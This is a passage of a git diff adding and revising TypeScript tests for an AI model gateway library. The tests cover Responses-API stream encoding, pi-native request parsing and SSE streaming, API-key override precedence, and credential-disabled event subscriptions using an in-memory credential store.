string).startsWith("msg_")).toBe(true); + expect(textDelta.output_index).toBe(1); + expect(textDelta.delta).toBe("Hi"); + expect(textDelta.logprobs).toEqual([]); + + const textDone = frames[idxTextDone]!.data as Record<string, unknown>; + expect(textDone.text).toBe("Hi!"); + expect(textDone.logprobs).toEqual([]); + + const messageDone = frames[idxMessageDone]!.data as Record<string, unknown>; + expect(messageDone.output_index).toBe(1); + expect(messageDone.item).toMatchObject({ + type: "message", + status: "completed", + content: [{ type: "output_text", text: "Hi!", annotations: [] }], + }); + + // function_call_arguments.delta uses the fc_* wire id, NOT call_x. + const argsDelta = frames[idxArgsDelta]!.data as Record<string, unknown>; + expect(argsDelta.item_id).toBe("fc_x"); + expect(argsDelta.output_index).toBe(2); + expect(argsDelta.delta).toBe('{"a":'); + + const argsDone = frames[idxArgsDone]!.data as Record<string, unknown>; + expect(argsDone.item_id).toBe("fc_x"); + expect(argsDone.arguments).toBe('{"a":1}'); + expect(argsDone.name).toBe("math"); + + // response.completed: assert the final response object carries the full output items + // and that call_id ≠ id for the function_call item. + const completed = frames[idxCompleted]!.data as Record<string, unknown>; + const response = completed.response as Record<string, unknown>; + expect(response.status).toBe("completed"); + expect(response.model).toBe("gpt-5-requested"); + const output = response.output as Array<Record<string, unknown>>; + expect(output).toHaveLength(3); + expect(output[0]!.type).toBe("reasoning"); + expect(output[1]!.type).toBe("message"); + expect(output[2]).toMatchObject({ + type: "function_call", + id: "fc_x", + call_id: "call_x", + name: "math", + arguments: '{"a":1}', + }); + // Critical gotcha: id and call_id are distinct. + expect(output[2]!.id).not.toBe(output[2]!.call_id); + }); + + it("emits response.incomplete for length-limited streams", async () => { + const stream = new AssistantMessageEventStream(); + const message: AssistantMessage = { + role: "assistant", + api: "openai-responses", + provider: "openai", + model: "gpt-5", + content: [{ type: "text", text: "partial" }], + usage: { ...zeroUsage(), output: 1 }, + stopReason: "length", + timestamp: 1_700_000_000_000, + }; + + queueMicrotask(() => { + stream.push({ type: "start", partial: { ...message, content: [] } }); + stream.push({ type: "text_start", contentIndex: 0, partial: message }); + stream.push({ type: "text_delta", contentIndex: 0, delta: "partial", partial: message }); + stream.push({ type: "text_end", contentIndex: 0, content: "partial", partial: message }); + stream.push({ type: "done", reason: "length", message }); + }); + + const raw = await collectStream(encodeStream(stream, "gpt-5-requested")); + const frames = parseSse(raw); + const names = frames.map(f => f.event); + const idxIncomplete = names.indexOf("response.incomplete"); + + expect(idxIncomplete).toBeGreaterThan(-1); + expect(names).not.toContain("response.completed"); + const incomplete = frames[idxIncomplete]!.data as Record<string, unknown>; + const response = incomplete.response as Record<string, unknown>; + expect(response.status).toBe("incomplete"); + expect(response.incomplete_details).toEqual({ reason: "max_output_tokens" }); + }); +}); diff --git a/packages/ai/test/auth-gateway-pi-native.test.ts b/packages/ai/test/auth-gateway-pi-native.test.ts new file mode 100644 index 000000000..7c10a65a7 --- /dev/null +++ b/packages/ai/test/auth-gateway-pi-native.test.ts @@ -0,0 +1,280 @@ +import { describe, expect, it } from "bun:test"; +import { Effort } from "../src/model-thinking"; +import { encodeStream, formatError, parseRequest } from "../src/providers/pi-native-server"; +import type { + AssistantMessage, + AssistantMessageEvent, + AssistantMessageEventStream, + Context, + Usage, +} from "../src/types"; + +function makeEventStream(events: AssistantMessageEvent[], final: AssistantMessage): AssistantMessageEventStream { + async function* iter() { + for (const e of events) yield e; + } + const stream = iter() as unknown as AssistantMessageEventStream; + (stream as { result(): Promise<AssistantMessage> }).result = async () => final; + return stream; +} + +async function collectSse(stream: ReadableStream<Uint8Array>): Promise<string[]> { + const reader = stream.getReader(); + const decoder = new TextDecoder(); + let buf = ""; + for (;;) { + const { value, done } = await reader.read(); + if (done) break; + buf += decoder.decode(value, { stream: true }); + } + buf += decoder.decode(); + return buf.split("\n\n").filter(s => s.length > 0); +} + +function parseSseLine(line: string): unknown { + const stripped = line.replace(/^data: /, ""); + if (stripped === "[DONE]") return "[DONE]"; + return JSON.parse(stripped); +} + +const ZERO_USAGE: Usage = { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + totalTokens: 0, + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, +}; + +function baseAssistant(overrides?: Partial<AssistantMessage>): AssistantMessage { + return { + role: "assistant", + content: [], + api: "anthropic-messages", + provider: "anthropic", + model: "claude-sonnet-4-5", + usage: ZERO_USAGE, + stopReason: "stop", + timestamp: 0, + ...overrides, + }; +} + +const baseContext: Context = { + systemPrompt: ["you are helpful"], + messages: [{ role: "user", content: "hi", timestamp: 0 }], +}; + +describe("pi-native parseRequest", () => { + it("accepts modelId + context and returns canonical shape", () => { + const parsed = parseRequest({ + modelId: "claude-sonnet-4-5", + context: baseContext, + options: { temperature: 0.5, reasoning: Effort.High }, + stream: false, + }); + expect(parsed.modelId).toBe("claude-sonnet-4-5"); + expect(parsed.context).toEqual(baseContext); + expect(parsed.options.temperature).toBe(0.5); + expect(parsed.options.reasoning).toBe(Effort.High); + expect(parsed.stream).toBe(false); + }); + + it("falls back to model.id when modelId is absent (streamProxy compat)", () => { + const parsed = parseRequest({ + model: { id: "claude-opus-4-1", provider: "anthropic", api: "anthropic-messages" }, + context: baseContext, + }); + expect(parsed.modelId).toBe("claude-opus-4-1"); + }); + + it("accepts top-level string `model` as the id (extra compat)", () => { + const parsed = parseRequest({ + model: "gpt-5", + context: baseContext, + }); + expect(parsed.modelId).toBe("gpt-5"); + }); + + it("defaults stream to true when omitted", () => { + const parsed = parseRequest({ modelId: "x", context: baseContext }); + expect(parsed.stream).toBe(true); + }); + + it("drops server-controlled and unknown option keys", () => { + const parsed = parseRequest({ + modelId: "x", + context: baseContext, + options: { + temperature: 0.2, + apiKey: "should-be-stripped", + signal: {}, + fetch: () => {}, + onPayload: () => {}, + onResponse: () => {}, + onSseEvent: () => {}, + execHandlers: {}, + providerSessionState: new Map(), + notARealField: "ignored", + }, + }); + expect(parsed.options).toEqual({ temperature: 0.2 }); + expect("apiKey" in parsed.options).toBe(false); + expect("signal" in parsed.options).toBe(false); + expect("fetch" in parsed.options).toBe(false); + expect("onPayload" in parsed.options).toBe(false); + expect("notARealField" in parsed.options).toBe(false); + }); + + it("preserves headers, metadata, sessionId, thinkingBudgets", () => { + const parsed = parseRequest({ + modelId: "x", + context: baseContext, + options: { + headers: { "x-foo": "bar" }, + metadata: { user_id: "u" }, + sessionId: "explicit-session", + thinkingBudgets: { high: 8192 }, + stopSequences: ["\n\n"], + toolChoice: "required", + serviceTier: "priority", + cacheRetention: "long", + }, + }); + expect(parsed.options.headers).toEqual({ "x-foo": "bar" }); + expect(parsed.options.metadata).toEqual({ user_id: "u" }); + expect(parsed.options.sessionId).toBe("explicit-session"); + expect(parsed.options.thinkingBudgets).toEqual({ high: 8192 }); + expect(parsed.options.stopSequences).toEqual(["\n\n"]); + expect(parsed.options.toolChoice).toBe("required"); + expect(parsed.options.serviceTier).toBe("priority"); + expect(parsed.options.cacheRetention).toBe("long"); + }); + + it("rejects missing required fields", () => { + expect(() => parseRequest({ context: baseContext })).toThrow(/modelId/); + expect(() => parseRequest({ modelId: "x" })).toThrow(/context/); + expect(() => parseRequest({ modelId: "x", context: { systemPrompt: [] } })).toThrow(/messages/); + }); + + it("rejects non-object body", () => { + expect(() => parseRequest(null)).toThrow(); + expect(() => parseRequest("hello")).toThrow(); + expect(() => parseRequest([])).toThrow(); + }); + + it("validates systemPrompt and tools shape", () => { + expect(() => parseRequest({ modelId: "x", context: { systemPrompt: "not array", messages: [] } })).toThrow( + /systemPrompt/, + ); + expect(() => parseRequest({ modelId: "x", context: { messages: [], tools: "not array" } })).toThrow(/tools/); + }); + + it("skips null and undefined option values", () => { + const parsed = parseRequest({ + modelId: "x", + context: baseContext, + options: { temperature: null, topP: undefined, maxTokens: 100 }, + }); + expect("temperature" in parsed.options).toBe(false); + expect("topP" in parsed.options).toBe(false); + expect(parsed.options.maxTokens).toBe(100); + }); +}); +describe("pi-native encodeStream", () => { + it("ships every AssistantMessageEvent verbatim, terminated by [DONE]", async () => { + // Pi-native is omp-talks-to-omp: the client feeds parsed events directly + // into `AssistantMessageEventStream.push()`, so the wire IS the canonical + // event type. No partial-stripping, no per-event re-shaping. + const finalMessage = baseAssistant({ + content: [{ type: "text", text: "hi" }], + usage: { ...ZERO_USAGE, input: 4, output: 2, totalTokens: 6 }, + }); + const partialAfterDelta: AssistantMessage = baseAssistant({ + content: [{ type: "text", text: "hi" }], + }); + const events: AssistantMessageEvent[] = [ + { type: "start", partial: baseAssistant() }, + { type: "text_start", contentIndex: 0, partial: baseAssistant({ content: [{ type: "text", text: "" }] }) }, + { type: "text_delta", contentIndex: 0, delta: "hi", partial: partialAfterDelta }, + { type: "text_end", contentIndex: 0, content: "hi", partial: partialAfterDelta }, + { type: "done", reason: "stop", message: finalMessage }, + ]; + const chunks = await collectSse(encodeStream(makeEventStream(events, finalMessage))); + const parsed = chunks.map(parseSseLine); + + // Every payload is the input event verbatim — partials, signatures, + // usage all intact. Terminator follows `done`/`error`. + expect(parsed.length).toBe(events.length + 1); + for (let i = 0; i < events.length; i++) { + expect(parsed[i]).toEqual(JSON.parse(JSON.stringify(events[i]))); + } + expect(parsed[parsed.length - 1]).toBe("[DONE]"); + }); + + it("preserves the rolling `partial` on every delta (sanity: no shrink)", async () => { + // Guards against an accidental re-introduction of partial-stripping + // optimization. Clients depend on `partial` being present. + const final = baseAssistant({ content: [{ type: "text", text: "abc" }] }); + const events: AssistantMessageEvent[] = [ + { type: "text_delta", contentIndex: 0, delta: "abc", partial: final }, + { type: "done", reason: "stop", message: final }, + ]; + const parsed = (await collectSse(encodeStream(makeEventStream(events, final)))).map(parseSseLine) as Array< + Record<string, unknown> + >; + expect(parsed[0]).toHaveProperty("partial"); + expect((parsed[0] as { partial: AssistantMessage }).partial.content).toEqual([{ type: "text", text: "abc" }]); + }); + + it("stops streaming after a terminal `done` and emits [DONE] once", async () => { + const final = baseAssistant(); + const events: AssistantMessageEvent[] = [ + { type: "done", reason: "stop", message: final }, + // This trailing event must NOT reach the wire — terminal events end + // the stream so the client iterator resolves cleanly. + { type: "text_delta", contentIndex: 0, delta: "ghost", partial: final }, + ]; + const parsed = (await collectSse(encodeStream(makeEventStream(events, final)))).map(parseSseLine); + expect(parsed.length).toBe(2); + expect((parsed[0] as { type: string }).type).toBe("done"); + expect(parsed[1]).toBe("[DONE]"); + }); + + it("forwards `error` events verbatim, then closes with [DONE]", async () => { + const errored = baseAssistant({ + stopReason: "error", + errorMessage: "upstream blew up", + usage: { ...ZERO_USAGE, input: 3 }, + }); + const events: AssistantMessageEvent[] = [{ type: "error", reason: "error", error: errored }]; + const parsed = (await collectSse(encodeStream(makeEventStream(events, errored)))).map(parseSseLine); + expect(parsed[0]).toEqual({ type: "error", reason: "error", error: JSON.parse(JSON.stringify(errored)) }); + expect(parsed[1]).toBe("[DONE]"); + }); + + it("emits a synthetic error envelope when the source iterator throws", async () => { + // Source-stream failures (network drop after `streamSimple` returned) + // must not hang the client. We surface a minimal `error` event followed + // by `[DONE]` so the iterator on the other end resolves. + const broken = (async function* () { + yield { type: "start", partial: baseAssistant() } satisfies AssistantMessageEvent; + throw new Error("connection reset"); + })() as unknown as AssistantMessageEventStream; + (broken as { result(): Promise<AssistantMessage> }).result = async () => baseAssistant(); + + const parsed = (await collectSse(encodeStream(broken))).map(parseSseLine); + expect((parsed[0] as { type: string }).type).toBe("start"); + expect(parsed[1]).toEqual({ type: "error", reason: "error", errorMessage: "connection reset" }); + expect(parsed[2]).toBe("[DONE]"); + }); +}); + +describe("pi-native formatError", () => { + it("emits { error: { type, message } } with the given status", async () => { + const res = formatError(401, "authentication_error", "no credential"); + expect(res.status).toBe(401); + expect(res.headers.get("Content-Type")).toBe("application/json; charset=utf-8"); + expect(await res.json()).toEqual({ error: { type: "authentication_error", message: "no credential" } }); + }); +}); diff --git a/packages/ai/test/auth-storage-api-key-login.test.ts b/packages/ai/test/auth-storage-api-key-login.test.ts index 48abc62a8..62e3a5a7d 100644 --- a/packages/ai/test/auth-storage-api-key-login.test.ts +++ b/packages/ai/test/auth-storage-api-key-login.test.ts @@ -4,7 +4,7 @@ import * as fs from "node:fs/promises"; import * as os from "node:os"; import * as path from "node:path"; -import { AuthCredentialStore, AuthStorage } from "../src/auth-storage"; +import { AuthStorage, SqliteAuthCredentialStore } from "../src/auth-storage"; import * as kagiModule from "../src/utils/oauth/kagi"; import * as ollamaCloudModule from "../src/utils/oauth/ollama-cloud"; @@ -23,7 +23,7 @@ function countCredentialRows(dbPath: string, provider: string): number { describe("AuthStorage api-key login replacement", () => { let tempDir = ""; let dbPath = ""; - let store: AuthCredentialStore | null = null; + let store: SqliteAuthCredentialStore | null = null; let authStorage: AuthStorage | null = null; let loginKagiSpy: Mock<typeof kagiModule.loginKagi>; let loginOllamaCloudSpy: Mock<typeof ollamaCloudModule.loginOllamaCloud>; @@ -31,7 +31,7 @@ describe("AuthStorage api-key login replacement", () => { beforeEach(async () => { tempDir = await fs.mkdtemp(path.join(os.tmpdir(), "pi-ai-auth-api-key-login-")); dbPath = path.join(tempDir, "agent.db"); - store = await AuthCredentialStore.open(dbPath); + store = await SqliteAuthCredentialStore.open(dbPath); authStorage = new AuthStorage(store); loginKagiSpy = vi.spyOn(kagiModule, "loginKagi"); loginOllamaCloudSpy = vi.spyOn(ollamaCloudModule, "loginOllamaCloud"); diff --git a/packages/ai/test/auth-storage-codex-selection.test.ts b/packages/ai/test/auth-storage-codex-selection.test.ts index 0a74c4c4d..99bffa787 100644 --- a/packages/ai/test/auth-storage-codex-selection.test.ts +++ b/packages/ai/test/auth-storage-codex-selection.test.ts @@ -2,7 +2,7 @@ import { afterEach, beforeEach, describe, expect, test, vi } from "bun:test"; import * as fs from "node:fs/promises"; import * as os from "node:os"; import * as path from "node:path"; -import { AuthCredentialStore, AuthStorage } from "../src/auth-storage"; +import { type AuthCredentialStore, AuthStorage, SqliteAuthCredentialStore } from "../src/auth-storage"; import type { UsageLimit, UsageProvider, UsageReport } from "../src/usage"; import * as oauthUtils from "../src/utils/oauth"; import type { OAuthCredentials } from "../src/utils/oauth/types"; @@ -120,7 +120,7 @@ describe("AuthStorage codex oauth ranking", () => { beforeEach(async () => { tempDir = await fs.mkdtemp(path.join(os.tmpdir(), "pi-ai-auth-codex-selection-")); - store = await AuthCredentialStore.open(path.join(tempDir, "agent.db")); + store = await SqliteAuthCredentialStore.open(path.join(tempDir, "agent.db")); authStorage = new AuthStorage(store, { usageProviderResolver: provider => (provider === "openai-codex" ? usageProvider : undefined), }); @@ -590,7 +590,7 @@ describe("AuthStorage claude oauth ranking", () => { beforeEach(async () => { tempDir = await fs.mkdtemp(path.join(os.tmpdir(), "pi-ai-auth-claude-selection-")); - store = await AuthCredentialStore.open(path.join(tempDir, "agent.db")); + store = await SqliteAuthCredentialStore.open(path.join(tempDir, "agent.db")); authStorage = new AuthStorage(store, { usageProviderResolver: provider => (provider === "anthropic" ? usageProvider : undefined), }); diff --git a/packages/ai/test/auth-storage-config-override.test.ts b/packages/ai/test/auth-storage-config-override.test.ts new file mode 100644 index 000000000..16e140255 --- /dev/null +++ b/packages/ai/test/auth-storage-config-override.test.ts @@ -0,0 +1,125 @@ +import { afterEach, beforeEach, describe, expect, test } from "bun:test"; +import * as fs from "node:fs/promises"; +import * as os from "node:os"; +import * as path from "node:path"; +import { type AuthCredentialStore, AuthStorage, SqliteAuthCredentialStore } from "../src/auth-storage"; +import { withEnv } from "./helpers"; + +const SUPPRESS_ANTHROPIC_ENV = { + ANTHROPIC_API_KEY: undefined, + ANTHROPIC_OAUTH_TOKEN: undefined, +} as const; + +describe("AuthStorage config-override apiKey", () => { + let tempDir = ""; + let store: AuthCredentialStore | null = null; + let authStorage: AuthStorage | null = null; + + beforeEach(async () => { + tempDir = await fs.mkdtemp(path.join(os.tmpdir(), "pi-ai-auth-config-override-")); + store = await SqliteAuthCredentialStore.open(path.join(tempDir, "agent.db")); + authStorage = new AuthStorage(store); + }); + + afterEach(async () => { + store?.close(); + store = null; + authStorage = null; + if (tempDir) { + await fs.rm(tempDir, { recursive: true, force: true }); + tempDir = ""; + } + }); + + async function seedOAuth(provider: string, access: string): Promise<void> { + if (!authStorage) throw new Error("test setup failed"); + await authStorage.set(provider, [ + { + type: "oauth", + access, + refresh: `${access}-refresh`, + expires: Date.now() + 60 * 60_000, + }, + ]); + } + + test("setConfigApiKey beats OAuth access token for getApiKey", async () => { + await withEnv(SUPPRESS_ANTHROPIC_ENV, async () => { + if (!authStorage) throw new Error("test setup failed"); + await seedOAuth("anthropic", "oauth-from-broker"); + authStorage.setConfigApiKey("anthropic", "gateway-bearer"); + + expect(await authStorage.getApiKey("anthropic")).toBe("gateway-bearer"); + expect(await authStorage.peekApiKey("anthropic")).toBe("gateway-bearer"); + }); + }); + + test("runtime override (--api-key) still beats setConfigApiKey", async () => { + await withEnv(SUPPRESS_ANTHROPIC_ENV, async () => { + if (!authStorage) throw new Error("test setup failed"); + await seedOAuth("anthropic", "oauth-from-broker"); + authStorage.setConfigApiKey("anthropic", "gateway-bearer"); + authStorage.setRuntimeApiKey("anthropic", "cli-flag-bearer"); + + expect(await authStorage.getApiKey("anthropic")).toBe("cli-flag-bearer"); + }); + }); + + test("removeConfigApiKey restores OAuth resolution", async () => { + await withEnv(SUPPRESS_ANTHROPIC_ENV, async () => { + if (!authStorage) throw new Error("test setup failed"); + await seedOAuth("anthropic", "oauth-from-broker"); + authStorage.setConfigApiKey("anthropic", "gateway-bearer"); + expect(await authStorage.getApiKey("anthropic")).toBe("gateway-bearer"); + + authStorage.removeConfigApiKey("anthropic"); + expect(await authStorage.getApiKey("anthropic")).toBe("oauth-from-broker"); + }); + }); + + test("clearConfigApiKeys drops every config override at once", async () => { + await withEnv(SUPPRESS_ANTHROPIC_ENV, async () => { + if (!authStorage) throw new Error("test setup failed"); + await seedOAuth("anthropic", "oauth-anthropic"); + await seedOAuth("openai-codex", "oauth-codex"); + authStorage.setConfigApiKey("anthropic", "gateway-bearer-A"); + authStorage.setConfigApiKey("openai-codex", "gateway-bearer-B"); + + authStorage.clearConfigApiKeys(); + + expect(await authStorage.getApiKey("anthropic")).toBe("oauth-anthropic"); + expect(await authStorage.getApiKey("openai-codex")).toBe("oauth-codex"); + }); + }); + + test("setConfigApiKey suppresses OAuth account_uuid attribution", async () => { + await withEnv(SUPPRESS_ANTHROPIC_ENV, async () => { + if (!authStorage) throw new Error("test setup failed"); + await authStorage.set("anthropic", [ + { + type: "oauth", + access: "oauth-with-account", + refresh: "r", + expires: Date.now() + 60 * 60_000, + accountId: "acc-123", + }, + ]); + // Sanity: without override, accountId is exposed. + expect(authStorage.getOAuthAccountId("anthropic")).toBe("acc-123"); + + authStorage.setConfigApiKey("anthropic", "gateway-bearer"); + // With an explicit config bearer in play, OAuth account attribution + // must NOT leak — outbound auth is the gateway bearer, not OAuth. + expect(authStorage.getOAuthAccountId("anthropic")).toBeUndefined(); + }); + }); + + test("describeCredentialSource reports config override", async () => { + await withEnv(SUPPRESS_ANTHROPIC_ENV, async () => { + if (!authStorage) throw new Error("test setup failed"); + await seedOAuth("anthropic", "oauth-from-broker"); + authStorage.setConfigApiKey("anthropic", "gateway-bearer"); + expect(authStorage.describeCredentialSource("anthropic")).toBe("config override (models.yml)"); + }); + }); +}); diff --git a/packages/ai/test/auth-storage-credential-disabled-event.test.ts b/packages/ai/test/auth-storage-credential-disabled-event.test.ts index 6c3bb0f6d..7a67faf50 100644 --- a/packages/ai/test/auth-storage-credential-disabled-event.test.ts +++ b/packages/ai/test/auth-storage-credential-disabled-event.test.ts @@ -1,8 +1,11 @@ import { afterEach, beforeEach, describe, expect, test, vi } from "bun:test"; -import * as fs from "node:fs/promises"; -import * as os from "node:os"; -import * as path from "node:path"; -import { AuthCredentialStore, AuthStorage, type CredentialDisabledEvent } from "../src/auth-storage"; +import { + type AuthCredential, + type AuthCredentialStore, + AuthStorage, + type CredentialDisabledEvent, + type StoredAuthCredential, +} from "../src/auth-storage"; import * as oauthUtils from "../src/utils/oauth"; // Env vars short-circuit AuthStorage.getApiKey before the OAuth refresh path runs; suppress @@ -24,33 +27,105 @@ const failOAuthRefresh = (message = 'HTTP 400 invalid_grant {"error":"invalid_gr }); }; +class MemoryAuthCredentialStore implements AuthCredentialStore { + #rows: StoredAuthCredential[] = []; + #nextId = 1; + + close(): void {} + + listAuthCredentials(provider?: string): StoredAuthCredential[] { + return this.#rows.filter(row => row.disabledCause === null && (!provider || row.provider === provider)); + } + + updateAuthCredential(id: number, credential: AuthCredential): void { + const row = this.#rows.find(entry => entry.id === id); + if (row) row.credential = credential; + } + + deleteAuthCredential(id: number, disabledCause: string): void { + const row = this.#rows.find(entry => entry.id === id); + if (row) row.disabledCause = disabledCause; + } + + tryDisableAuthCredentialIfMatches(id: number, expectedData: string, disabledCause: string): boolean { + const row = this.#rows.find(entry => entry.id === id && entry.disabledCause === null); + if (!row || serializeTestCredential(row.credential) !== expectedData) return false; + row.disabledCause = disabledCause; + return true; + } + + replaceAuthCredentialsForProvider(provider: string, credentials: AuthCredential[]): StoredAuthCredential[] { + for (const row of this.#rows) { + if (row.provider === provider && row.disabledCause === null) { + row.disabledCause = "replaced by newer credential"; + } + } + const rows = credentials.map( + (credential): StoredAuthCredential => ({ + id: this.#nextId++, + provider, + credential, + disabledCause: null, + }), + ); + this.#rows.push(...rows); + return rows; + } + + upsertAuthCredentialForProvider(provider: string, credential: AuthCredential): StoredAuthCredential[] { + return this.replaceAuthCredentialsForProvider(provider, [credential]); + } + + deleteAuthCredentialsForProvider(provider: string, disabledCause: string): void { + for (const row of this.#rows) { + if (row.provider === provider && row.disabledCause === null) row.disabledCause = disabledCause; + } + } + + getCache(): string | null { + return null; + } + + setCache(): void {} + + cleanExpiredCache(): void {} +} + +function serializeTestCredential(credential: AuthCredential): string { + if (credential.type === "api_key") return JSON.stringify({ key: credential.key }); + if (credential.type === "oauth") { + const { type: _type, ...rest } = credential; + return JSON.stringify(rest); + } + return ""; +} + +function disableCredential(authStorage: AuthStorage, id: number, provider = "anthropic"): void { + expect(authStorage.disableCredentialById(id, "oauth refresh failed: invalid_grant")).toBe(true); + expect(authStorage.list()).not.toContain(provider); +} + describe("AuthStorage credential_disabled subscriptions", () => { - let tempDir = ""; const stores: AuthCredentialStore[] = []; - const openStorage = async (options?: ConstructorParameters<typeof AuthStorage>[1]): Promise<AuthStorage> => { - const store = await AuthCredentialStore.open(path.join(tempDir, `agent-${stores.length}.db`)); + const openStorage = (options?: ConstructorParameters<typeof AuthStorage>[1]): AuthStorage => { + const store = new MemoryAuthCredentialStore(); stores.push(store); return new AuthStorage(store, options); }; - beforeEach(async () => { - tempDir = await fs.mkdtemp(path.join(os.tmpdir(), "pi-ai-credential-disabled-subs-")); + beforeEach(() => { for (const key of SUPPRESS_ANTHROPIC_ENV) { savedEnv[key] = process.env[key]; delete process.env[key]; } }); - afterEach(async () => { + afterEach(() => { vi.restoreAllMocks(); for (const store of stores.splice(0)) { store.close(); } - if (tempDir) { - await fs.rm(tempDir, { recursive: true, force: true }); - tempDir = ""; - } for (const key of SUPPRESS_ANTHROPIC_ENV) { if (savedEnv[key] === undefined) { delete process.env[key]; @@ -64,7 +139,7 @@ describe("AuthStorage credential_disabled subscriptions", () => { describe("constructor `onCredentialDisabled` option", () => { test("fires when an OAuth credential is disabled by a definitive refresh failure", async () => { const events: CredentialDisabledEvent[] = []; - const authStorage = await openStorage({ + const authStorage = openStorage({ onCredentialDisabled: event => { events.push(event); }, @@ -82,7 +157,7 @@ describe("AuthStorage credential_disabled subscriptions", () => { test("does not fire for transient (non-definitive) refresh failures", async () => { const events: CredentialDisabledEvent[] = []; - const authStorage = await openStorage({ + const authStorage = openStorage({ onCredentialDisabled: event => { events.push(event); }, @@ -95,21 +170,18 @@ describe("AuthStorage credential_disabled subscriptions", () => { }); test("swallows synchronous handler exceptions so the disable still completes", async () => { - const authStorage = await openStorage({ + const authStorage = openStorage({ onCredentialDisabled: () => { throw new Error("subscriber exploded"); }, }); await authStorage.set("anthropic", [expiredOAuth()]); - failOAuthRefresh("invalid_grant"); - - await expect(authStorage.getApiKey("anthropic", "session-handler-throws")).resolves.toBeUndefined(); - expect(authStorage.list()).not.toContain("anthropic"); + disableCredential(authStorage, 1); }); test("swallows async handler rejections so the disable path still completes", async () => { const settled = Promise.withResolvers<void>(); - const authStorage = await openStorage({ + const authStorage = openStorage({ onCredentialDisabled: async () => { // Yield so the rejection lands on the microtask queue, not synchronously. await Promise.resolve(); @@ -118,7 +190,6 @@ describe("AuthStorage credential_disabled subscriptions", () => { }, }); await authStorage.set("anthropic", [expiredOAuth()]); - failOAuthRefresh("invalid_grant"); const unhandled: unknown[] = []; const onUnhandled = (reason: unknown): void => { @@ -126,10 +197,9 @@ describe("AuthStorage credential_disabled subscriptions", () => { }; process.on("unhandledRejection", onUnhandled); try { - await expect(authStorage.getApiKey("anthropic", "session-async-handler-throws")).resolves.toBeUndefined(); + disableCredential(authStorage, 1); await settled.promise; await Bun.sleep(0); - expect(authStorage.list()).not.toContain("anthropic"); expect(unhandled).toHaveLength(0); } finally { process.off("unhandledRejection", onUnhandled); @@ -141,7 +211,7 @@ describe("AuthStorage credential_disabled subscriptions", () => { test("registers an additional subscriber alongside the constructor handler — both fire", async () => { const constructorEvents: CredentialDisabledEvent[] = []; const runtimeEvents: CredentialDisabledEvent[] = []; - const authStorage = await openStorage({ + const authStorage = openStorage({ onCredentialDisabled: event => { constructorEvents.push(event); }, @@ -151,9 +221,7 @@ describe("AuthStorage credential_disabled subscriptions", () => { }); await authStorage.set("anthropic", [expiredOAuth()]); - failOAuthRefresh("invalid_grant"); - - await authStorage.getApiKey("anthropic", "session-both-fire"); + disableCredential(authStorage, 1); expect(constructorEvents).toHaveLength(1); expect(runtimeEvents).toHaveLength(1); expect(constructorEvents[0]?.provider).toBe("anthropic"); @@ -163,7 +231,7 @@ describe("AuthStorage credential_disabled subscriptions", () => { test("fans out every event to every subscriber", async () => { const aEvents: CredentialDisabledEvent[] = []; const bEvents: CredentialDisabledEvent[] = []; - const authStorage = await openStorage(); + const authStorage = openStorage(); authStorage.onCredentialDisabled(event => { aEvents.push(event); }); @@ -172,17 +240,15 @@ describe("AuthStorage credential_disabled subscriptions", () => { }); await authStorage.set("anthropic", [expiredOAuth()]); await authStorage.set("openai", [expiredOAuth()]); - failOAuthRefresh("invalid_grant"); - - await authStorage.getApiKey("anthropic", "session-fanout-anthropic"); - await authStorage.getApiKey("openai", "session-fanout-openai"); + disableCredential(authStorage, 1); + disableCredential(authStorage, 2, "openai"); expect(aEvents.map(event => event.provider)).toEqual(["anthropic", "openai"]); expect(bEvents.map(event => event.provider)).toEqual(["anthropic", "openai"]); }); test("unsubscribe removes only that listener; others continue to fire", async () => { - const authStorage = await openStorage(); + const authStorage = openStorage(); const aEvents: CredentialDisabledEvent[] = []; const bEvents: CredentialDisabledEvent[] = []; const unsubscribeA = authStorage.onCredentialDisabled(event => { @@ -194,21 +260,20 @@ describe("AuthStorage credential_disabled subscriptions", () => { await authStorage.set("anthropic", [expiredOAuth()]); await authStorage.set("openai", [expiredOAuth()]); - failOAuthRefresh("invalid_grant"); - await authStorage.getApiKey("anthropic", "session-pre-unsubscribe"); + disableCredential(authStorage, 1); expect(aEvents).toHaveLength(1); expect(bEvents).toHaveLength(1); unsubscribeA(); - await authStorage.getApiKey("openai", "session-post-unsubscribe"); + disableCredential(authStorage, 2, "openai"); expect(aEvents).toHaveLength(1); expect(bEvents).toHaveLength(2); }); test("unsubscribe is idempotent: a second call is a no-op and does not affect other listeners", async () => { - const authStorage = await openStorage(); + const authStorage = openStorage(); const aEvents: CredentialDisabledEvent[] = []; const bEvents: CredentialDisabledEvent[] = []; const unsubscribeA = authStorage.onCredentialDisabled(event => { @@ -222,15 +287,14 @@ describe("AuthStorage credential_disabled subscriptions", () => { unsubscribeA(); await authStorage.set("anthropic", [expiredOAuth()]); - failOAuthRefresh("invalid_grant"); - await authStorage.getApiKey("anthropic", "session-idempotent-unsub"); + disableCredential(authStorage, 1); expect(aEvents).toHaveLength(0); expect(bEvents).toHaveLength(1); }); test("a throwing subscriber does not block other subscribers from receiving the event", async () => { - const authStorage = await openStorage(); + const authStorage = openStorage(); const tailEvents: CredentialDisabledEvent[] = []; authStorage.onCredentialDisabled(() => { throw new Error("first subscriber exploded"); @@ -240,14 +304,13 @@ describe("AuthStorage credential_disabled subscriptions", () => { }); await authStorage.set("anthropic", [expiredOAuth()]); - failOAuthRefresh("invalid_grant"); - await expect(authStorage.getApiKey("anthropic", "session-throw-isolation")).resolves.toBeUndefined(); + disableCredential(authStorage, 1); expect(tailEvents).toHaveLength(1); }); test("an async-rejecting subscriber does not trip unhandledRejection and does not block others", async () => { - const authStorage = await openStorage(); + const authStorage = openStorage(); const tailEvents: CredentialDisabledEvent[] = []; const settled = Promise.withResolvers<void>(); authStorage.onCredentialDisabled(async () => { @@ -260,7 +323,6 @@ describe("AuthStorage credential_disabled subscriptions", () => { }); await authStorage.set("anthropic", [expiredOAuth()]); - failOAuthRefresh("invalid_grant"); const unhandled: unknown[] = []; const onUnhandled = (reason: unknown): void => { @@ -268,7 +330,7 @@ describe("AuthStorage credential_disabled subscriptions", () => { }; process.on("unhandledRejection", onUnhandled); try { - await authStorage.getApiKey("anthropic", "session-async-throw-isolation"); + disableCredential(authStorage, 1); await settled.promise; await Bun.sleep(0); expect(tailEvents).toHaveLength(1); @@ -281,11 +343,10 @@ describe("AuthStorage credential_disabled subscriptions", () => { describe("buffer-and-replay for events fired with no subscribers", () => { test("replays buffered events to the first subscriber that triggers the 